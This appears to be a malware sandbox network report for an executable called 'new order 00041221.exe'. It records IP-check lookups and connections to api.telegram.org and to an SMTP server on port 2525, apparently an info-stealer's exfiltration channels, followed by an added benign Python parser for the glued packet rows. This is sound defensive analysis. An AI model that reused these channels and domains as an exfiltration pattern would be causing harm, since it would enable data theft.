Jul 26, 2024 09:03:16.791650057 CEST | 80 | 49713 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:16.791708946 CEST | 49713 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:16.791847944 CEST | 49713 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:16.796879053 CEST | 80 | 49713 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:19.046257019 CEST | 80 | 49713 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:19.048593044 CEST | 49714 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:19.048628092 CEST | 443 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:19.048765898 CEST | 49714 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:19.049093008 CEST | 49714 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:19.049105883 CEST | 443 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:19.097068071 CEST | 49713 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:19.511085987 CEST | 443 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:19.512948036 CEST | 49714 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:19.512973070 CEST | 443 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:19.632844925 CEST | 443 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:19.632921934 CEST | 443 | 49714 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:19.632999897 CEST | 49714 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:19.633580923 CEST | 49714 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:19.637445927 CEST | 49713 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:19.638541937 CEST | 49715 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:19.643400908 CEST | 80 | 49713 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:19.643529892 CEST | 49713 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:19.643709898 CEST | 80 | 49715 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:19.643805027 CEST | 49715 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:19.643990040 CEST | 49715 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:19.649305105 CEST | 80 | 49715 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:22.177618027 CEST | 80 | 49715 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:22.179352999 CEST | 49716 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:22.179400921 CEST | 443 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:22.179471016 CEST | 49716 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:22.179747105 CEST | 49716 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:22.179758072 CEST | 443 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:22.221874952 CEST | 49715 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:22.641446114 CEST | 443 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:22.643264055 CEST | 49716 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:22.643302917 CEST | 443 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:22.790102005 CEST | 443 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:22.790200949 CEST | 443 | 49716 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:22.790254116 CEST | 49716 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:22.796539068 CEST | 49716 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:22.827532053 CEST | 49715 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:22.828885078 CEST | 49718 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:22.833036900 CEST | 80 | 49715 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:22.833084106 CEST | 49715 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:22.833739042 CEST | 80 | 49718 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:22.833801031 CEST | 49718 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:22.834057093 CEST | 49718 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:22.839128971 CEST | 80 | 49718 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:23.482217073 CEST | 80 | 49718 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:23.483360052 CEST | 49720 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:23.483395100 CEST | 443 | 49720 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:23.483465910 CEST | 49720 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:23.483668089 CEST | 49720 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:23.483678102 CEST | 443 | 49720 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:23.534396887 CEST | 49718 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:23.965667009 CEST | 443 | 49720 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:23.967667103 CEST | 49720 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:23.967699051 CEST | 443 | 49720 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:24.118855000 CEST | 443 | 49720 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:24.119066954 CEST | 443 | 49720 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:24.119179010 CEST | 49720 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:24.119705915 CEST | 49720 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:24.137238026 CEST | 49718 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:24.140444040 CEST | 49722 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:24.142745972 CEST | 80 | 49718 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:24.142842054 CEST | 49718 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:24.145524979 CEST | 80 | 49722 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:24.145667076 CEST | 49722 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:24.147607088 CEST | 49722 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:24.152587891 CEST | 80 | 49722 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:26.356765985 CEST | 80 | 49722 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:26.359874010 CEST | 49725 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:26.359915972 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:26.360249043 CEST | 49725 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:26.360435009 CEST | 49725 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:26.360445976 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:26.409490108 CEST | 49722 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:26.864325047 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:26.878006935 CEST | 49725 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:26.878038883 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:27.017858982 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:27.017968893 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.7
Jul 26, 2024 09:03:27.018022060 CEST | 49725 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:27.019392014 CEST | 49725 | 443 | 192.168.2.7 | 188.114.97.3
Jul 26, 2024 09:03:27.043045998 CEST | 49722 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:27.048341036 CEST | 80 | 49722 | 193.122.6.168 | 192.168.2.7
Jul 26, 2024 09:03:27.048403978 CEST | 49722 | 80 | 192.168.2.7 | 193.122.6.168
Jul 26, 2024 09:03:27.051434994 CEST | 49726 | 443 | 192.168.2.7 | 149.154.167.220
Jul 26, 2024 09:03:27.051460028 CEST | 443 | 49726 | 149.154.167.220 | 192.168.2.7
Jul 26, 2024 09:03:27.051536083 CEST | 49726 | 443 | 192.168.2.7 | 149.154.167.220
Jul 26, 2024 09:03:27.052506924 CEST | 49726 | 443 | 192.168.2.7 | 149.154.167.220
Jul 26, 2024 09:03:27.052516937 CEST | 443 | 49726 | 149.154.167.220 | 192.168.2.7
Jul 26, 2024 09:03:27.673579931 CEST | 443 | 49726 | 149.154.167.220 | 192.168.2.7
Jul 26, 2024 09:03:27.673825026 CEST | 49726 | 443 | 192.168.2.7 | 149.154.167.220
Jul 26, 2024 09:03:27.734774113 CEST | 49726 | 443 | 192.168.2.7 | 149.154.167.220
Jul 26, 2024 09:03:27.734791994 CEST | 443 | 49726 | 149.154.167.220 | 192.168.2.7
Jul 26, 2024 09:03:27.735407114 CEST | 443 | 49726 | 149.154.167.220 | 192.168.2.7
                                          Jul 26, 2024 09:03:27.739933968 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:27.780513048 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.918943882 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.919035912 CEST44349726149.154.167.220192.168.2.7
                                          Jul 26, 2024 09:03:27.919100046 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:27.922861099 CEST49726443192.168.2.7149.154.167.220
                                          Jul 26, 2024 09:03:33.156932116 CEST4970780192.168.2.7193.122.6.168
                                          Jul 26, 2024 09:03:34.440284014 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:34.445215940 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:34.445343971 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:36.176240921 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.176511049 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:36.181655884 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.523237944 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.523497105 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:36.529000044 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.842788935 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:36.843630075 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:36.848593950 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.172761917 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.172775984 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.172787905 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.172964096 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:37.201371908 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:37.206260920 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.523972034 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.527039051 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:37.532322884 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.851963043 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:37.853307962 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:37.859302998 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:38.166686058 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:38.180031061 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:38.184792995 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.522603035 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.523319960 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:40.528223991 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.842854977 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.843704939 CEST252549727203.124.44.4192.168.2.7
                                          Jul 26, 2024 09:03:40.843766928 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:40.850321054 CEST497272525192.168.2.7203.124.44.4
                                          Jul 26, 2024 09:03:40.855396986 CEST252549727203.124.44.4192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2024 09:03:05.810882092 CEST | 52429 | 53 | 192.168.2.7 | 1.1.1.1
Jul 26, 2024 09:03:05.818300962 CEST | 53 | 52429 | 1.1.1.1 | 192.168.2.7
Jul 26, 2024 09:03:06.947355032 CEST | 50025 | 53 | 192.168.2.7 | 1.1.1.1
Jul 26, 2024 09:03:06.955200911 CEST | 53 | 50025 | 1.1.1.1 | 192.168.2.7
Jul 26, 2024 09:03:27.042723894 CEST | 50679 | 53 | 192.168.2.7 | 1.1.1.1
Jul 26, 2024 09:03:27.050193071 CEST | 53 | 50679 | 1.1.1.1 | 192.168.2.7
Jul 26, 2024 09:03:33.355645895 CEST | 59996 | 53 | 192.168.2.7 | 1.1.1.1
Jul 26, 2024 09:03:34.363585949 CEST | 59996 | 53 | 192.168.2.7 | 1.1.1.1
Jul 26, 2024 09:03:34.434303999 CEST | 53 | 59996 | 1.1.1.1 | 192.168.2.7
Jul 26, 2024 09:03:34.434468031 CEST | 53 | 59996 | 1.1.1.1 | 192.168.2.7
Jul 26, 2024 09:03:39.604254007 CEST | 53 | 49769 | 162.159.36.2 | 192.168.2.7
Jul 26, 2024 09:03:40.088443041 CEST | 65345 | 53 | 192.168.2.7 | 1.1.1.1
Jul 26, 2024 09:03:40.096103907 CEST | 53 | 65345 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 26, 2024 09:03:05.810882092 CEST | 192.168.2.7 | 1.1.1.1 | 0x9736 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:06.947355032 CEST | 192.168.2.7 | 1.1.1.1 | 0x7fcf | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:27.042723894 CEST | 192.168.2.7 | 1.1.1.1 | 0x32a2 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:33.355645895 CEST | 192.168.2.7 | 1.1.1.1 | 0x2142 | Standard query (0) | mail.moonbrosurgical.com | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:34.363585949 CEST | 192.168.2.7 | 1.1.1.1 | 0x2142 | Standard query (0) | mail.moonbrosurgical.com | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:40.088443041 CEST | 192.168.2.7 | 1.1.1.1 | 0xffe | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 26, 2024 09:03:05.818300962 CEST | 1.1.1.1 | 192.168.2.7 | 0x9736 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 09:03:05.818300962 CEST | 1.1.1.1 | 192.168.2.7 | 0x9736 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:05.818300962 CEST | 1.1.1.1 | 192.168.2.7 | 0x9736 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:05.818300962 CEST | 1.1.1.1 | 192.168.2.7 | 0x9736 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:05.818300962 CEST | 1.1.1.1 | 192.168.2.7 | 0x9736 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:05.818300962 CEST | 1.1.1.1 | 192.168.2.7 | 0x9736 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:06.955200911 CEST | 1.1.1.1 | 192.168.2.7 | 0x7fcf | No error (0) | reallyfreegeoip.org |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:06.955200911 CEST | 1.1.1.1 | 192.168.2.7 | 0x7fcf | No error (0) | reallyfreegeoip.org |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:27.050193071 CEST | 1.1.1.1 | 192.168.2.7 | 0x32a2 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:34.434303999 CEST | 1.1.1.1 | 192.168.2.7 | 0x2142 | No error (0) | mail.moonbrosurgical.com |  | 203.124.44.4 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:34.434468031 CEST | 1.1.1.1 | 192.168.2.7 | 0x2142 | No error (0) | mail.moonbrosurgical.com |  | 203.124.44.4 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 09:03:40.096103907 CEST | 1.1.1.1 | 192.168.2.7 | 0xffe | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
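The packet and DNS rows in this report lost their column separators in extraction, so ports and addresses run together. The following is an added example, not part of the Joe Sandbox report or its tooling, that recovers the fields of such rows and pivots them onto the DNS answers. It assumes the analysis host is 192.168.2.7 (as the session rows state), so exactly one address per row is known in advance; it cuts the glued port digits by requiring the host's side to be an ephemeral port (49152 to 65535) and refuses any row where that cut is not unique. The sample rows and the IP-to-name map are copied from this report's own tables.

```python
import re
from collections import Counter

# Analysis host of this report (Source IP of every HTTP session). Every packet
# row has it on exactly one side, which is what makes the glued row parseable.
LOCAL_IP = "192.168.2.7"

# Constructed sample: rows copied verbatim from the TCP/UDP packet tables above.
SAMPLE_ROWS = [
    "Jul 26, 2024 09:03:24.119179010 CEST49720443192.168.2.7188.114.97.3",
    "Jul 26, 2024 09:03:24.142745972 CEST8049718193.122.6.168192.168.2.7",
    "Jul 26, 2024 09:03:27.051434994 CEST49726443192.168.2.7149.154.167.220",
    "Jul 26, 2024 09:03:34.440284014 CEST497272525192.168.2.7203.124.44.4",
    "Jul 26, 2024 09:03:36.176240921 CEST252549727203.124.44.4192.168.2.7",
    "Jul 26, 2024 09:03:05.818300962 CEST53524291.1.1.1192.168.2.7",
    "Jul 26, 2024 09:03:39.604254007 CEST5349769162.159.36.2192.168.2.7",
]

# IP -> name, taken from the DNS answer rows of this report.
DNS_ANSWERS = {
    "193.122.6.168": "checkip.dyndns.org",
    "188.114.97.3": "reallyfreegeoip.org",
    "149.154.167.220": "api.telegram.org",
    "203.124.44.4": "mail.moonbrosurgical.com",
}

TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]+)(\S+)$")


def is_ip(s):
    """Dotted quad with octets 0-255 and no leading zeros."""
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and int(p) <= 255 and (p == "0" or p[0] != "0") for p in parts)


def split_ports(digits, local_is_src):
    """Every cut of the glued port digits where the analysis host's port is ephemeral."""
    cuts = []
    for i in range(1, len(digits)):
        a, b = digits[:i], digits[i:]
        if a.startswith("0") or b.startswith("0"):
            continue
        sp, dp = int(a), int(b)
        if max(sp, dp) > 65535:
            continue
        if 49152 <= (sp if local_is_src else dp) <= 65535:
            cuts.append((sp, dp))
    return cuts


def parse_row(row, local_ip=LOCAL_IP):
    """Return (timestamp, src_port, dst_port, src_ip, dst_ip); raise if the cut is ambiguous."""
    m = TS_RE.match(row.strip())
    if not m:
        raise ValueError("no timestamp in row: %r" % row)
    ts, body = m.groups()
    cands = []
    for hit in re.finditer(re.escape(local_ip), body):
        before, after = body[:hit.start()], body[hit.end():]
        if after and before.isdigit() and is_ip(after):        # host is the source
            cands += [(ts, sp, dp, local_ip, after) for sp, dp in split_ports(before, True)]
        elif not after and "." in before:                       # host is the destination
            head, rest = before.split(".", 1)                   # head = ports + 1st octet
            for n in (1, 2, 3):                                 # width of that octet
                digits, remote = head[:-n], head[-n:] + "." + rest
                if digits and is_ip(remote):
                    cands += [(ts, sp, dp, remote, local_ip)
                              for sp, dp in split_ports(digits, False)]
    if len(cands) != 1:
        raise ValueError("ambiguous row (%d cuts): %r" % (len(cands), row))
    return cands[0]


def contacts(rows, dns=DNS_ANSWERS, local_ip=LOCAL_IP):
    """Packets per remote (name or IP, service port), whichever direction they flow."""
    seen = Counter()
    for row in rows:
        _, sp, dp, sip, dip = parse_row(row, local_ip)
        remote_ip, remote_port = (dip, dp) if sip == local_ip else (sip, sp)
        seen[(dns.get(remote_ip, remote_ip), remote_port)] += 1
    return seen


if __name__ == "__main__":
    for (name, port), n in contacts(SAMPLE_ROWS).most_common():
        print("%-28s %5d  packets=%d" % (name, port, n))
```

The uniqueness check matters: a glued string such as 53524291 could be 53/52429 or 53524/291, and only the direction of the packet (the resolver 1.1.1.1 is the source, so the destination port must be the host's ephemeral one) settles it. Rows the rule cannot settle raise instead of silently picking a split.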
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 193.122.6.168 | 80 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 09:03:05.832084894 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jul 26, 2024 09:03:06.531081915 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Fri, 26 Jul 2024 07:03:06 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 4f864800286d0022b792a27194a18461
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 26, 2024 09:03:06.535823107 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jul 26, 2024 09:03:06.891879082 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Fri, 26 Jul 2024 07:03:06 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 998273e9fd81af013b085cdce1aee904
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 26, 2024 09:03:07.992885113 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jul 26, 2024 09:03:09.247378111 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Fri, 26 Jul 2024 07:03:09 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: bedd99471cb74802748ce2acd2fffb61
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49707 | 193.122.6.168 | 80 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 09:03:09.930144072 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jul 26, 2024 09:03:10.593067884 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Fri, 26 Jul 2024 07:03:10 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 3f08438484c17a4ea8db810717db00ce
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49710 | 193.122.6.168 | 80 | 5292 | C:\Users\user\Desktop\new order 00041221.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 09:03:11.227489948 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jul 26, 2024 09:03:13.940898895 CEST | 730 | IN | HTTP/1.1 502 Bad Gateway
    Date: Fri, 26 Jul 2024 07:03:13 GMT
    Content-Type: text/html
    Content-Length: 547
    Connection: keep-alive
    X-Request-ID: a3f7163b6b7b98234329adf6a7a6dd02
